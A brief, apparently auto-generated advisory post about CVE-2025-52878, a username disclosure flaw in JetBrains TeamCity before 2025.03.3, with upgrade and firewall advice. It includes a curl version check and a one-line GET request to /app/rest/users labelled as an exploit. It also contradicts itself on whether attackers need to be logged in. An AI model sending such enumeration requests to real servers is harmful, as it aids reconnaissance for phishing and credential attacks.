Listen to this Post
How the CVE Works
CVE-2025-52878 is an information disclosure vulnerability in JetBrains TeamCity versions before 2025.03.3. The flaw improperly exposes usernames to unauthorized users due to insufficient permission checks. Attackers can exploit this by accessing internal API endpoints or user enumeration features, leaking sensitive account details. This could aid in further attacks like credential stuffing or targeted phishing. The vulnerability stems from flawed session validation logic, allowing low-privileged users to retrieve restricted user metadata.
DailyCVE Form:
Platform: JetBrains TeamCity
Version: < 2025.03.3
Vulnerability: Information Disclosure
Severity: Medium
Date: 06/25/2025
Prediction: Patch by 07/10/2025
What Undercode Say
Check TeamCity version curl -s http://<target>/api/version Exploit PoC (unauthorized username dump) GET /app/rest/users HTTP/1.1 Host: <target>
How Exploit
Unauthenticated attackers send crafted HTTP requests to `/app/rest/users` or similar endpoints, extracting usernames.
Protection from this CVE
- Upgrade to TeamCity 2025.03.3+
- Restrict API access via firewall rules
Impact
Exposed usernames increase attack surface for social engineering or brute-force attacks.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
